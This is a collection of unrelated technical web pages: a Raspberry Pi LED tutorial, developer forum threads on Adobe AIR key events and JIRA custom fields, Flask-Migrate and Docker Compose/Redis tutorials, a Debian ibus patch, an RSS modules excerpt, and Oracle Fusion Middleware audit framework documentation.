Building a Raspberry Pi LED Flasher In this simple electronics project, you get to build a simple breadboard circuit that connects an LED to a Raspberry Pi via the GPIO port on pin 3 of the header. The figure shows the completed project. In this project, you connect an external LED to a Raspberry Pi, and then use a simple sketch to turn the LED on and off at 0.5-second intervals. Parts needed to build an LED flasher - One Raspberry Pi 2 or 3 with Raspbian installed, connected to a monitor, keyboard, and power - One small solderless breadboard (RadioShack 2760003) - One 5mm red LED (RadioShack 2760209) - One resistor (orange-orange-brown) - Two jumper wires (M/F) Steps for building an LED flasher - Insert resistor R1. R1 – 330 Ω: A3 to ground bus - Insert LED1. Cathode (short lead): D5 Anode (long lead): D3 - Connect the ground bus to the Raspberry Pi header pin 2. Use a jumper to connect any hole in the ground bus on the breadboard. - Connect pin 3 on the Raspberry Pi A5 on the breadboard. - Open the Python 2 IDLE Editor with root privileges. - Create and save the sketch shown here, using the filename LedBlink. import RPi.GPIO as GPIO import time GPIO.setmode(GPIO.BOARD) GPIO.setup(3, GPIO.OUT) while True: GPIO.output(3, GPIO.HIGH) time.sleep(0.5) GPIO.output(3, GPIO.LOW) time.sleep(0.5) - Run the LedBlink program by choosing Run → Run Module (or press F5). The LED on the breadboard will flash on and off at half-second intervals.
https://www.dummies.com/computers/raspberry-pi/building-raspberry-pi-led-flasher/
CC-MAIN-2019-13
en
refinedweb
what is the best way to listen for key events Hi All I hope someone can help I am creating a adobe air for android app and i have a problem. I need to navigate through tha app using the hardware key on the phone which dispatches the a keyCode : Keyboard.BACK. Now how i have wired everything up is. In the app contex I have added a listenerto the stage see below: contextView.stage.addEventListener(KeyboardEvent.KEY_DOWN, dispatchEvent); commandMap.mapEvent(keyboardEvent.KEY_DOWN, Backcommand, KeyboardEvent) This listens for a keyevent then calls the backCommand which takes action. The back command looks like the below: public class BackCommand extends Command{ [Inject] public var appModel:AppModel; [Inject] public var evt:KeyboardEvent; public override function execute ( ):void { evt.preventDefault(); evt.stopImmediatePropagation(); //make sure we have a section to go back to appModel.currHistoryPos--; if(appModel.currHistoryPos <0){ //reset the var. if we dont it will error appModel.currHistoryPos = -1; } //trace("key registered.... " + evt, "curr back num is: "+appModel.currHistoryPos); if (evt.keyCode == Keyboard.BACK) { if (appModel.currHistoryPos >= 0) { if (exitSection(appModel.currSection) == true) { //if we have reached the top of the app sections either library, browse or create exit the app appModel.nextSection = Sections.EXIT; dispatch(new AppEvent(AppEvent.SECTION_CHANGE)); }else { //only iof the hardware back key has been pressed do this trace("//================ key registered.... " + appModel.currHistoryPos); //tells the app we are using it's buttons to naviagte. This is used for the history memory so when back is pressed we can go back to previous section appModel.navType = "back"; //grab the new section and set it to be the next section to see then disaptch event to app to jump to that section var backSection:String = appModel.backMemory[appModel.currHistoryPos]; appModel.nextSection = backSection; dispatch(new AppEvent(AppEvent.SECTION_CHANGE)); } } } } The problem I am having is the back seems to exit the app which it should not do. it should just move to the previous view. So I was wondering am I setting up the keyboard event right. if you could gide me with an example that ould be great. regards Mike :) Comments are currently closed for this discussion. You can start a new one. Keyboard shortcuts Generic Comment Form You can use Command ⌘ instead of Control ^ on Mac 1 Posted by Michal Wroblews... on 27 Jul, 2011 08:36 PM You should use evt.preventDefault()to prevent the app from closing at Back button and you're using it. Please try to do the same without any command mapping for a check. Just addEventListener and in handler method use preventDefault(), remove evt.stopImmediatePropagation();by the way. And what is contextView.stage.addEventListener(KeyboardEvent.KEY_DOWN, dispatchEvent);doing? Maybe dispatchEvent handler stops immediate propagation? 2 Posted by Mike oscar on 27 Jul, 2011 08:52 PM Hi michal I have tried as without command and it works but this my implementation above does not work. So this leads me to believe that I need to do this differently as I think the preventdefault() is not working the way it is. Is there a different way to do the above so the event is passed directly to the function. Any code will help. Regards mike :) 3 Posted by Michal Wroblews... on 28 Jul, 2011 10:37 AM Looks like not the same instance of the event is passed to the command or something else causes the problem. Do it that way: 1. Leave listener without the command. It will prevent the default behavior. Don't use stopImmediatePropagation(). 2. Use your own logic as you described in your command. You don't have to preventDefault here. Please debug your application and place breakpoints in both command and key listener. Check if events are the same instances (compare memory pointers) Thanks Mike 4 Posted by Stray on 28 Jul, 2011 10:44 AM The clone() will mean that the events are unlikely to be the same instances. 5 Posted by Michal Wroblews... on 28 Jul, 2011 10:45 AM When events are cloned? 6 Posted by Shawn on 29 Jul, 2011 09:46 PM Why would RL clone the event? Can't it just pass along the original reference to the command? 7 Posted by Michal Wroblews... on 29 Jul, 2011 09:57 PM Shawn, no idea. I'm using SignalCommandMap and if I need to pass an event I just pass it there :) So I haven't faced the problem. Thanks for letting us know. Probably it should be filled as a bug. Mike Support Staff 8 Posted by Robert Penner on 14 Sep, 2011 07:25 PM If you redispatch an Event, EventDispatcher automatically clones it, because the Event's target and currentTarget properties could be different. Ondina D.F. closed this discussion on 21 Nov, 2011 09:09 AM.
http://robotlegs.tenderapp.com/discussions/problems/354-what-is-the-best-way-to-listen-for-key-events
CC-MAIN-2019-13
en
refinedweb
Implementing Database Migrations to Badgeyay Badgeyay project is divided into two parts i.e front-end of Ember JS and back-end with REST-API programmed in Python. We have integrated PostgreSQL as the object-relational database in Badgeyay and we are using SQLAlchemy SQL Toolkit and Object Relational Mapper tools for working with databases and Python. As we have Flask microframework for Python, so we are having Flask-SQLAlchemy as an extension for Flask that adds support for SQLAlchemy to work with the ORM. One of the challenging jobs is to manage changes we make to the models and propagate these changes in the database. For this purpose, I have added Added Migrations to Flask SQLAlchemy for handling database changes using the Flask-Migrate extension. In this blog, I will be discussing how I added Migrations to Flask SQLAlchemy for handling Database changes using the Flask-Migrate extension in my Pull Request. First, Let’s understand Database Models, Migrations, and Flask Migrate extension. Then we will move onto adding migrations using Flask-Migrate. Let’s get started and understand it step by step. What are Database Models? A Database model defines the logical design and structure of a database which includes the relationships and constraints that determine how data can be stored and accessed. Presently, we are having a User and file Models in the project. What are Migrations? Database migration is a process, which usually includes assessment, database schema conversion. Migrations enable us to manipulate modifications we make to the models and propagate these adjustments in the database. For example, if later on, we make a change to a field in one of the models, all we will want to do is create and do a migration, and the database will replicate the change. What is Flask Migrate? Flask-Migrate is an extension that handles SQLAlchemy database migrations for Flask applications using Alembic. The database operations are made available through the Flask command-line interface or through the Flask-Script extension. Now let’s add support for migration in Badgeyay. Step 1 : pip install flask-migrate Step 2 : We will need to edit run.py and it will look like this : import os from flask import Flask from flask_migrate import Migrate // Imported Flask Migrate from api.db import db from api.config import config ...... db.init_app(app) migrate = Migrate(app, db) // It will allow us to run migrations ...... @app.before_first_request def create_tables(): db.create_all() if __name__ == '__main__': app.run() Step 3 : Creation of Migration Directory. export FLASK_APP=run.py flask db init This will create Migration Directory in the backend API folder. └── migrations ├── README ├── alembic.ini ├── env.py ├── script.py.mako └── versions Step 4 : We will do our first Migration by the following command. flask db migrate Step 5 : We will apply the migrations by the following command. flask db upgrade Now we are all done with setting up Migrations to Flask SQLAlchemy for handling database changes in the badgeyay repository. We can verify the Migration by checking the database tables in the Database. This is how I have added Migrations to Flask SQLAlchemy for handling Database changes using the Flask-Migrate extension in my Pull Request. Resources:
https://blog.fossasia.org/tag/flask-migrate/
CC-MAIN-2019-13
en
refinedweb
In the previous post we have learned how to build a multi-container application. On top of the website we have built in the second post of the series, we have added a Web API, which is leveraged by the web application to display the list of posts published on this blog. The two applications have been deployed in two different containers but, thanks to the bridge network offered by the Docker, we've been able to put them in communication. In this post we're going to see two additional steps: - We're going to add a new service to the solution. In all the previous posts we have built custom images, since we needed to run inside a container an application we have built. This time, instead, we're going to use a service as it is: Redis. - We're going to see how we can easily deploy our multi-container application. The approach we've seen in the previous post (using the docker run command on each container) isn't very practical in the real world, where all the containers must be deployed simultaneously and you may have hundreds of them. Let's start! Adding a Redis cache to our application Redis is one of the most popular caching solutions on the market. At its core, it's a document-oriented database which can store key-value pairs. It's used to improve performances and reliability of applications, thanks to its main features: - It's an in-memory database, which makes all the writing and reading operations much faster compared to a traditional database which persists the data into the disk. - It supports replication. - It supports clustering. We're going to use it in our Web API to store the content of the RSS feed. This time, if the RSS feed has already been downloaded, we won't download it again but we will retrieve it from the Redis cache. As first step, we need to host Redis inside a container. The main difference compared to what we have done in the previous posts is that Redis is a service, not a framework or a platform. Our web application will use it as it is, we don't need to build an application on top of it like we did with the .NET Core image. This means that we don't need to build a custom image, but we can just use the official one provided by the Redis team. We can use the standard docker run command to initialize our container: docker run --rm --network my-net --name rediscache -d redis As usual, the first time we execute this command Docker will pull the image from Docker Hub. Notice how, also in this case (like we did for the WebAPI in the previous post, we aren't exposing the service on the host machine through a port. The reason is that the Redis cache will be leveraged only by the Web API, so we need it to be accessible only from the other containers. We have also set the name of the container (rediscache) and we have connected it to the bridge called my-net, which we have created in the previous post. Feel free to run the docker ps command to check that everything is up & running: PS C:\Users\mpagani\Source\Samples\NetCoreApi\WebSample> docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 1475ccd3ec0a redis "docker-entrypoint.s…" 4 seconds ago Up 2 seconds 6379/tcp rediscache Now we can start tweaking our WebAPI to use the Redis cache. Open with Visual Studio Code the Web API project we have previously built and move to the NewsController.cs file. The easiest way to leverage a Redis cache in a .NET Core application is using a NuGet package called StackExchange.Redis. To add it to your project open the terminal and run: dotnet add package StackExchange.Redis Once the package has been installed, we can start changing the code of the GetAsync() method declared in the NewsController class in the following way: [HttpGet] public async Task<ActionResult<IEnumerable<string>>> Get() { ConnectionMultiplexer connection = await ConnectionMultiplexer.ConnectAsync("rediscache"); var db = connection.GetDatabase(); List<string> news = new List<string>(); string rss = string.Empty; rss = await db.StringGetAsync("feedRss"); if (string.IsNullOrEmpty(rss)) { HttpClient client = new HttpClient(); rss = await client.GetStringAsync(""); await db.StringSetAsync("feedRss", rss); } else { news.Add("The RSS has been returned from the Redis cache"); }; } In order to let this code compile, you will need to add the following namespace at the top of the class: using StackExchange.Redis; In the first line we're using the ConnectionMultiplexer class to connect to the instance of the Redis cache we have created. Since we have connected the container to a custom network, we can reference it using its name rediscache, which will be resolved by the internal DNS, as we have learned in the previous post. Then we get a reference to the database calling the GetDatabase() method. Once we have a database, using it is really simple since it offers a set of get and set methods for the various data types supported by Redis. In our scenario we need to store the RSS feed, which is a string, so we use the StringGetAsync() and StringSetAsync() methods. At first, we try to retrieve from the cache a value identified by the key feedRss. If it's null, it means that the cache is empty, so we need to download the RSS first. Once we have downloaded it, we store it in the cache with the same key. Just for testing purposes, in case the RSS is coming from the cache and not from the web, we add an extra item in the returned list. This way, it will be easier for us to determine if our caching implementation is working. Now that we have finished our work, we can build an updated image as usual, by right clicking on the Dockerfile in Visual Studio Code and choosing Build Image or by running the following command: docker build -t qmatteoq/testwebapi . We don't need, instead, to change the code of the web application. The Redis cache will be completely transparent to it. We are ready to run again our containers. Also in this case, we're going to connect them to same bridge of the Redis cache and we're going to assign a fixed name: docker run --rm -p 8080:80 --name webapp --network my-net -d qmatteoq/testwebapp docker run --rm --name newsfeed --network my-net -d qmatteoq/testwebapi The first command launches the container with the website (thus, the 80 port is exposed to the 8080 port on machine), while the second one launches the Web API (which doesn't need to be exposed to the host, since it will be consumed only by the web application). Now open your browser and point it to. The first time it should take a few second to start, because we're performing the request against the online RSS feed. You should see, in the main page, just the list of posts from this blog: Now refresh the page. This time the operation should be much faster and, as first post of the list, you should see the test item we have added in code when the feed is retrieved from the Redis cache: Congratulations! You have added a new service to your multi-container application! Deploy your application If you think about using Docker containers in production or with a really complex application, you can easily understand all the limitations of the approach we have used so far. When you deploy an application, you need all the containers to start as soon as possible. Manually launching docker run for each of them isn't a practical solution. Let's introduce Docker Compose! It's another command line tool, included in Docker for Windows, which can be used to compose multi-container applications. Thanks to a YAML file, you can describe the various services you need to run to boot your application. Then, using a simple command, Docker is able to automatically run or stop all the required containers. In this second part of the blog we're going to use Docker Compose to automatically start all the containers required by our application: the web app, the Web API and the Redis cache. The first step is to create a new file called docker-compose.yml inside a folder. It doesn't have to be a folder which contains a specific project, but it can be any folder since Docker Compose works with existing images that you should have already built. Let's see the content of our YAML file: version: '3' services: web: image: qmatteoq/testwebapp ports: - "8080:80" container_name: webapp newsfeed: image: qmatteoq/webapitest container_name: newsfeed redis: image: redis container_name: rediscache As you can see, the various commands are pretty easy to understand. version is used to set the Docker Compose file versioning we want to use. In this case, we're using the latest one. Then we create a section called services, which specifies each service we need to run for our multi-container application. For each service, we can specify different parameters, based on the configuration we want to achieve. The relevant ones we use are: - image, to define which is the image we want to use for this container - ports, to define which ports we want to expose to the host. It's the equivalent of the -p parameter of the docker run command - container_name, to define which name we want to assign to the container. It's the equivalent of the --name parameter of the docker run command. Once we have built our Docker Compose file, we can run it by opening a terminal on the same folder and launching the following command: PS C:\Users\mpagani\Source\Samples\NetCoreApi> docker-compose -f "docker-compose.yml" up -d --build Creating network "netcoreapi_default" with the default driver Creating newsfeed ... done Creating webapp ... done Creating rediscache ... done Did you see what just happened? Docker Compose has automatically created a new network bridge called netcoreapi_default for us and it has attached all the containers to it. If, in fact, you execute the docker network ls command, you will find this new bridge in the list: 7d245b95b7c4 netcoreapi_default bridge local a29b7408ba22 none null local Thanks to this approach, we didn't have to do anything special to create a custom network and assign all the containers to it, like instead we did in the previous post. If you remember, we had to manually create a new network and then, with the docker run command, add some additional parameters to make sure that the containers were connected to it instead of the default Docker bridge. This way, we don't have to worry about the DNS. As long as the container names we have specified inside the Docker Compose file are the same we use in our applications, we're good to go! Docker Compose, under the hood, uses the standard Docker commands. As such, if you run docker ps, you will simply see the 3 containers described in the YAML file up & running: PS C:\Users\mpagani\Source\Samples\NetCoreApi> docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ce786b5fc5f9 qmatteoq/testwebapp "dotnet TestWebApp.d…" 11 minutes ago Up 11 minutes 0.0.0.0:8080->80/tcp webapp 2ae1e86f8ca4 redis "docker-entrypoint.s…" 11 minutes ago Up 11 minutes 6379/tcp rediscache 2e2f08219f68 qmatteoq/webapitest "dotnet TestWebApi.d…" 11 minutes ago Up 11 minutes 80/tcp newsfeed We can notice how the configuration we have specified has been respected. All the containers have the expected names and only the one which hosts the web application is exposing the 80 port on the host. Now just open the browser again and point it to to see the usual website: If you want to stop your multi-container application, you can just use the docker-compose down command, instead of having to stop all the containers one by one: PS C:\Users\mpagani\Source\Samples\NetCoreApi> docker-compose down Stopping webapp ... done Stopping rediscache ... done Stopping newsfeed ... done Removing webapp ... done Removing rediscache ... done Removing newsfeed ... done Removing network netcoreapi_default As you can see, Docker Compose leaves the Docker ecosystem in a clean state. Other than stopping the containers, it also takes care of removing them and to remove the network bridge. If you run, in fact, the docker network ls command again, you won't find anymore the one called netcoreapi_default: a29b7408ba22 none null local In a similar way we have seen with Dockerfile and bulding images, also in this case Visual Studio Code makes easier to work with Docker Compose files. Other than providing IntelliSense and real-time documentation, we can right click on the docker-compose.yml file in the File Explorer and have direct access to the basic commands: Wrapping up In this post we have concluded the development of our multi-container application. We have added a new layer, a Redis cache, so that we have learned how to consume an existing image as it is. Then we have learned how, thanks to Docker Compose, it's easy to deploy a multi-container application and make sure that all the services are instantiated with the right configuration. You can find the complete sample project used during the various posts on GitHub. Happy coding!
https://blogs.msdn.microsoft.com/appconsult/2018/09/14/introduction-to-docker-deploy-a-multi-container-application/
CC-MAIN-2019-13
en
refinedweb
It's not the same without you Join the community to find out what other Atlassian users are discussing, debating and creating. Can't update multiple user picker custom field. Workflow transition's post function script: import com.atlassian.jira.component.ComponentAccessor import com.atlassian.jira.user.ApplicationUser; def customFieldManager = ComponentAccessor.getCustomFieldManager() def userManager = ComponentAccessor.getUserManager() def Approvers = customFieldManager.getCustomFieldObjectByName("MultipleUserPicker") List<applicationuser> newApprovers = []; ApplicationUser user = userManager.getUserByKey("user1"); newApprovers.add(user); user = userManager.getUserByKey("user2"); newApprovers.add(user); issue.setCustomFieldValue(Approvers, newApprovers) issue.store(); This code gives no mistake in text editor, but when I performing transition it alerts: It seems that you have tried to perform an illegal workflow operation.If you think this message is wrong, please contact your JIRA administrators. I can't see logs. Does anybody know what is wrong? When I comment this line "issue.setCustomFieldValue(Approvers, newApprovers)" alert disappears. Here on this page is example only for (single select) user picker. Thank You! You should use IssueService, which will do the reindexing for you. You should be able to replace your script with the one below: import com.atlassian.jira.bc.issue.IssueService import com.atlassian.jira.component.ComponentAccessor import com.atlassian.jira.issue.Issue def customFieldManager = ComponentAccessor.getCustomFieldManager() def issueService = ComponentAccessor.getComponent(IssueService) def approvers = customFieldManager.getCustomFieldObjectByName("MultipleUserPicker") def issue = issue as Issue def user = ComponentAccessor.jiraAuthenticationContext.loggedInUser def issueInputParameters = issueService.newIssueInputParameters() // Adding the user names here issueInputParameters.addCustomFieldValue(approvers.id, "user1", "user2") def updateValidationResult = issueService.validateUpdate(user, issue.id, issueInputParameters) if (updateValidationResult.isValid()) { issueService.update(user, updateValidationResult) } I changed names of CustomField and users but it is not working. This script generates no error, but field is empty. =(( I think I know what happened, user must have a permission to edit? I'll check it... Is it possible to select another user, not current logged in? "Edit issue" is deprecated in our project, we are changing fields in transitions. Each field in its own transition (very strict). Yes if the logged in user does not have issue edit permissions it can't be done. You should run it as a user with the correct permissions. You can get a user like so: import com.atlassian.jira.component.ComponentAccessor import com.atlassian.jira.user.util.UserManager def userManager = ComponentAccessor.getComponent(UserManager) def user = userManager.getUserByKey("userkey") Hi Adam, I'm trying to do the same, but what i have is an array / list of users (= MemberUsernames) of which i do not know how many they will be. Do you have a suggestion on how i could do that? issueInputParameters.addCustomFieldValue(approvers.id, MemberUsernames) def updateValidationResult = issueService.validateUpdate(currentReporterFull, issue.id, issueInputParameters) if (updateValidationResult.isValid()) { issueService.update(currentReporterFull, updateValidationResult) } } Thanks and best regards Thomas I changed names of CustomField and users but it is not working. This script generates no error, but field is.
https://community.atlassian.com/t5/Marketplace-Apps-questions/Post-script-function-multiple-user-picker-custom-field-update/qaq-p/352376
CC-MAIN-2019-13
en
refinedweb
RSS 2.0 introduces namespaced modules to the simple strand of RSS. The specification document states:. Other than not defining a namespace for the core elements of RSS 2.0, the modules work in the same way as the modules for RSS 1.0: declare the module's namespace in the root element (which in the case of RSS 2.0 is, of course, rss) and then use the module elements as directed by their specification. Parsers that do not recognize the namespace just ignore the new elements. Whether or not RSS 1.0 modules can be reused within RSS 2.0 is currently a matter of debate. To do so requires the feed author to declare two additional namespaces within the root element: the namespace of the module and the namespace of RDF. Some people find this additional complexity distasteful, and others find the rejection of the additionally powerful metadata a great shame. Still others, however, are using modules that declare the rdf:resource attribute without flinching. While this argument rages (I advise you to check out the relevant email lists for the latest blows and parries), we can always bear in mind the simple way to convert between the default module styles, which we will consider now. RSS 1.0 modules, you will remember, declare everything in terms of RDF resources. This is done with the rdf:resource attribute. For example, a fictional element pet:image, used to denote an image of the feed author's pet, would be written: <pet:image rdf: whereas in RSS 2.0, the default lack of RDF means you must just declare the URI of the image as a literal string: <pet:image>URI_OF_IMAGE</pet:image> But the differences go deeper than this, as we will now see as we design a new module: mod_Book.
http://etutorials.org/Misc/rss/Chapter+11.+Developing+New+Modules/11.1+Namespaces+and+Modules+with+RSS+2.0/
CC-MAIN-2017-22
en
refinedweb
Hi, > On Wed, May 17, 2017 at 02:03:22PM +0200, Ralf Jung wrote: >> I can confirm that replacing the aforementioned piece of code by just >> >> m_indicator.set_icon_full(icon_name, ""); >> >> (i.e., removing the preprocessor conditional entirely) fixes the >> problem: The icon is properly shown in the systray. > > Please send us a patch against current package Advertising I attached what I dropped in debian/patches. Kind regards, Ralf From: Ralf Jung <p...@ralfj.de> Date: Wed, 17 May 2017 13:56:19 +0200 X-Dgit-Generated: 1.5.14-2+local 854e73f39b613fda23e95975cf867d90827bd7fd Subject: assume we always have a new enough Plasma+Qt --- --- ibus-1.5.14.orig/ui/gtk3/panel.vala +++ ibus-1.5.14/ui/gtk3/panel.vala @@ -1372,15 +1372,7 @@ class Panel : IBus.PanelService { m_status_icon.set_from_file(icon_name); } else if (m_icon_type == IconType.INDICATOR) { -#if INDICATOR_ENGINE_ICON m_indicator.set_icon_full(icon_name, ""); -#else - warning("plasma-workspace 5.2 or later is required to " + - "show the absolute path icon %s. Currently check " + - "qtbase 5.4 since there is no way to check " + - "the version of plasma-workspace.", icon_name); - m_indicator.set_icon_full("ibus-engine", ""); -#endif } } else { string language = null;
https://www.mail-archive.com/debian-bugs-dist@lists.debian.org/msg1519478.html
CC-MAIN-2017-22
en
refinedweb
In Oracle Fusion Middleware 11g Release 1 (11.1.1), auditing provides a measure of accountability and answers the "who has done what and when" types of questions. This chapter introduces the audit service in Oracle Fusion Middleware. It contains the following topics: Section 12.1, "Benefits and Features of the Oracle Fusion Middleware Audit Framework" Section 12.2, "Overview of Audit Features" Section 12.3, "Oracle Fusion Middleware Audit Framework Concepts" Section 12.4, "The Audit Metadata Model" Section 12.5, "About Audit Definition Files", introduced in 11g Release 1 (11.1.1), is designed to provide a centralized audit framework for the middleware family of products. The framework provides an audit service for the following: Middleware Platform - This includes Java components such as Oracle Platform Security Services (OPSS) and Oracle Web Services. These are components that are leveraged by applications deployed on the middleware. Indirectly, all the deployed applications leveraging these Java components will benefit from the audit framework auditing events that are happening at the platform level. Java EE applications - The objective is to provide a service for Java EE applications, including Oracle's own Java EE-based components. Java EE applications are able to create application-specific audit events. System Components - For system components in the middleware that are managed by Oracle Process Manager and Notification Server, the audit service also provides an end-to-end structure similar to that for Java components. C Components - the framework provides audit C API for C/C++ based applications to integrate with the audit service. See Also: Understanding Key Oracle Fusion Middleware Concepts in the Oracle Fusion Middleware Administrator's Guide. Key features of the Oracle Fusion Middleware Audit Framework and audit service 14, "Using Audit Analysis and Reporting" for details. Audit record storage Audit data store (database) and files (bus-stop) are available. Maintaining a common location for all audit records simplifies maintenance. Using an audit leverages the SPI infrastructure of Oracle Platform Security Services Utilizes a dynamic metadata model. This section introduces basic concepts of the Oracle Fusion Middleware Audit Framework: Figure 12-1 shows the architecture of the Oracle Fusion Middleware Audit Framework: The figure illustrates essential elements of the architecture, including development and run-time services, the audit event flow, and key features, which are described below. At the heart of the framework is the audit service model, which like other OPSS services, provides a standards-based, integrated framework for Java EE and SE applications and Oracle components alike. Used across Oracle Fusion Middleware, this model enables you to conveniently leverage the platform's audit features, and includes: A dynamic audit matadata model that allows audit clients to manage audit event definitions and make version changes independent of build and release cycles. Audit event definitions can be dynamically updated at redeployment. Support for all aspects of the application lifecycle from design to development to deployment. A registration service to register your applications to the audit service declaratively; Java EE applications do so by packaging an XML configuration in ear files in the META-INF directory at deployment. programatically , by invoking the audit registration API. at the command line, through OPSS scripts. These APIs are provided by the audit framework for any audit-aware components integrating with the Oracle Fusion Middleware Audit Framework. During runtime, applications may call these APIs where appropriate to manage audit policies and to audit the necessary information about a particular event happening in the application code. The interface allows applications to specify event details such as username and other attributes needed to provide the context of the event being audited. The audit framework provides these APIs: audit service API audit client API audit administration service API See Chapter 28 for details. The process can be illustrated by looking at the actions taken in the framework when an. The audit metadata store contains audit event definitions for components and for applications integrated with the audit framework. For details, see Section 12.3.3. The audit data store is the repository of audit event records. It is a database that contains a pre-defined Oracle Fusion Middleware Audit Framework schema, created by Repository Creation Utility (RCU). Once the audit data store is configured, all the audit loaders are aware of the store and upload data to it periodically. The audit data in the store is expected to be cumulative and will grow overtime. Ideally, this should not be an operational database used by any other applications - rather, it should be a standalone database used for audit purposes only. The audit database can store audit events generated by Oracle components as well as user applications integrated with the audit framework. Note: The metadata store is separate from the audit data store. For details about the data store, see Section 12.3.4. Applications use audit definition files to specify to the audit service the auditing rules (events, filters, and so on) that will govern audit actions. For details, see Section 12.5. Loader is a module of the Oracle WebLogic Server instance and supports audit activity in that instance. When an audit data store is configured, audit loader is responsible for collecting the audit records for all components running in that instance and loading them to the data store. For Java components, the audit loader is started as part of the container start-up. For system components, the audit loader is a periodically spawned process that is invoked by OPMN. (audit is disabled for the component) Low (definition is component-dependent) Medium (definition is component-dependent) High ". The audit service model provides a standards-based, integrated framework for Java EE and SE applications to leverage audit features. Bus-stops are local files containing audit data records before they are pushed to the audit. Certain audit events implement filters to control when the event is logged. For example, a successful login event for the Oracle Internet Directory component may be filtered for specific users. For details, see Section 13.3, "Managing Audit Policies". data.?". The audit metadata store provides the repository for the metadata model and contains component audit definitions, NLS translation entries, runtime policies, and database mapping tables. Note: The metadata store is separate from the audit data store which contains the actual . The audit metadata store supports several critical auditing functions: The audit registration service creates, modifies, and deletes event definition entries. The audit runtime service retrieves event definitions and runtime policies. The audit data loader creates attribute database mappings to store audit data. Audit MBean commands look up and modify component audit definitions and runtime policies. The audit framework supports three types of metadata store: XML file-based database LDAP When a new application registers to the audit service, the following audit artifacts are stored in the audit store: audit event definitions including custom attribute group, categories, events, and filter preset definitions localized translation entries custom attribute-database column mapping table run-time audit policies As shown in Figure 12 EE. For further details, see Section 12.3.1, Publisher as a full-featured tool for structured reporting. You can also use your own reporting application. A large number of pre-defined reports are available in Oracle Business Intelligence Publisher,. From the standpoint of an administrator auditing into an environment consisting of Oracle Fusion Middleware components and applications, the key phases of implementing a functional audit system are as follows: Understand the architecture of the Common Audit Framework. For a review of the essential elements of the framework, the flow of actions, and the features of the audit service model, see Section 12.3.1. Integrate applications with the audit framework. For details about integration steps, see Section 28.2. Create the audit definition files that describe your application's audit events and how they map to the audit schema. For details on this topic, see Section 28.3. Register the application with the audit service. There are various ways to enable registration. For details, see Section 28.4. Migrate audit information from test to production. See Section 6.6.3. Generate audit reports. Descriptions of the tools and techniques of audit reporting appear in Chapter 14 and Section 28.7. The audit framework supports a metadata model which enables applications to specify their audit artifacts in a flexible manner. Applications can dynamically define attribute groups, categories, and events. Topics include: Naming Conventions for Audit Artifacts Event Categories and Events The following naming restrictions apply to category, event and attribute names: They must be in English only They must be less than 26 characters They can contain only the characters a through z, A through Z, and numbers 0 through 9 They must start with a letter. Attribute groups provide broad classification of audit attributes and consist of three types: The common attribute group contains all the system attributes common to all applications, such as component type, system IP address, hostname, and others. The IAU_COMMON database table contains attributes in this group. Generic attribute groups contain attributes for audit application areas such as authentication and user provisioning. Custom attribute groups are those defined by an application to meet its specific needs. Attributes in a custom group are limited to that component scope. Table 12-1 shows the supported attribute data types and the corresponding Java object types: The common attribute group is stored in the IAU_COMMON database table. A generic attribute group is defined with a namespace, a version number, and one or more attributes. This example defines an attribute group with namespace authorization and version 1.0: <AuditConfig xmlns="" > <Attributes ns="authorization" version="1.0"> <Attribute displayName="CodeSource" maxLength="2048" name="CodeSource" type="string"/> <Attribute displayName="Principals" maxLength="1024" name="Principals" type="string"/> <Attribute displayName="InitiatorGUID" maxLength="1024" name="InitiatorGUID" type="string"/> <Attribute displayName="Subject" maxLength="1024" name="Subject" type="string"> <HelpText>Used for subject in authorization</HelpText> </Attribute> </Attributes> …… Your application can reference the CodeSource attribute like this: <Attribute name="CodeSource" ns="authorization" version="1.0" /> Each generic attribute group is stored in a dedicated database table. The naming conventions are: IAU_ GENERIC_ATTRIBUTE_GROUP_NAME for table names IAU_ ATTRIBUTE_NAME for table columns For example, the attribute group authorization is stored in database table IAU_AUTHORIZATION with these columns: IAU_CODESOURCE as string IAU_PRINCIPALS as string IAU_INITIATORGUID as string A custom attribute group is defined with a namespace, a version number, and one or more attributes. Attributes consist of: attribute name data type attribute-database column mapping order - This property specifies the order in which an attribute is mapped to a database column of a specific data type in the custom attribute table. help text (optional) maximum length display name size - This property denotes how many values of the same data type the attribute can have. The default size value is 1. A size greater than 1 denotes a multi-valued attribute which can have two or more values of the same data type. The multi-value attribute supports all data types except for binary. This example defines attribute group Accounting with namespace accounting and version 1.0: <Attributes ns="accounting" version="1.0"> <Attribute name="TransactionType" displayName="Transaction Type" type="string" order="1"/> <Attribute name="AccountNumber" displayName="Account Number" type="int" order="2"> <HelpText>Account number.</HelpText> </Attribute> …… </Attributes> The following example shows a multi-valued attribute named AccountBalance: <Attribute order="3" displayName="AccountBalance" type="double" name="Balance" size="2" sinceVersion="1.1"> <MultiValues> <MultiValueName displayName="Previous Balance" index="0"> <HelpText>the previous account balance</HelpText> </MultiValueName> <MultiValueName displayName="Current Balance" index="1"/> </MultiValues> </Attribute> Custom attribute groups and attributes are stored in the IAU_CUSTOM table. An audit event category contains related events in a functional area. For example, a session category could contain login and logout events that are significant in a user session's life cycle. An event category does not itself define attributes. Instead, it references attributes in component and system attribute groups. There are two types of event categories: System Categories Component and Application Categories A system category references common and generic attribute groups and contains audit events. System categories are the base set of component event categories and events. Applications can reference them directly, log audit events, and set filter preset definitions. The following example shows several elements of the metadata model: common attribute group generic attribute groups identity and authorization system category UserSession with an attribute referencing to a common attribute AuthenticationMethod audit events such as UserLogin and UserLogout <SystemComponent major="1" minor="0"> +<Attributes ns="common" version ="1.0"></Attributes> +<Attributes ns="identity" version ="1.0"></Attributes> +<Attributes ns="authorization" version ="1.0"></Attributes> -<Events> -<Category name="UserSession" displayName="User Sessions"> -<Attributes> <Attribute name="AuthenticationMethod" ns="common" version ="1.0" /> </Attributes> -<HelpText></HelpText> -<Event name="UserLogin" displayName="User Logins" shortName="uLogin"></Event> -<Event name="UserLogout" displayName="User Logouts" shortName="uLogout" xdasName="terminateSession"></Event> -<Event name="Authentication" displayName="Authentication"></Event> -<Event name="InternalLogin" displayName="Internal Login" shortName="iLogin" xdasName="CreateSession"></Event> -<Event name="InternalLogout" displayName="Internal Logout" shortName="iLogout" xdasName="terminateSession"></Event> -<Event name="QuerySession" displayName="Query Session" shortName="qSession"></Event> -<Event name="ModifySession" displayName="Modify Session" shortName="mSession"></Event> </Category> +<Category displayName="Authorization" name="Authorization"></Category> +<Category displayName="ServiceManagement" name="ServiceManagement"></Category> </Events> </SystemComponent> A component or application can define extend system categories or define new component event categories. In this example, a transaction category references attributes AccountNumber, Date, and Amount from the accounting attribute group, and includes events 'purchase' 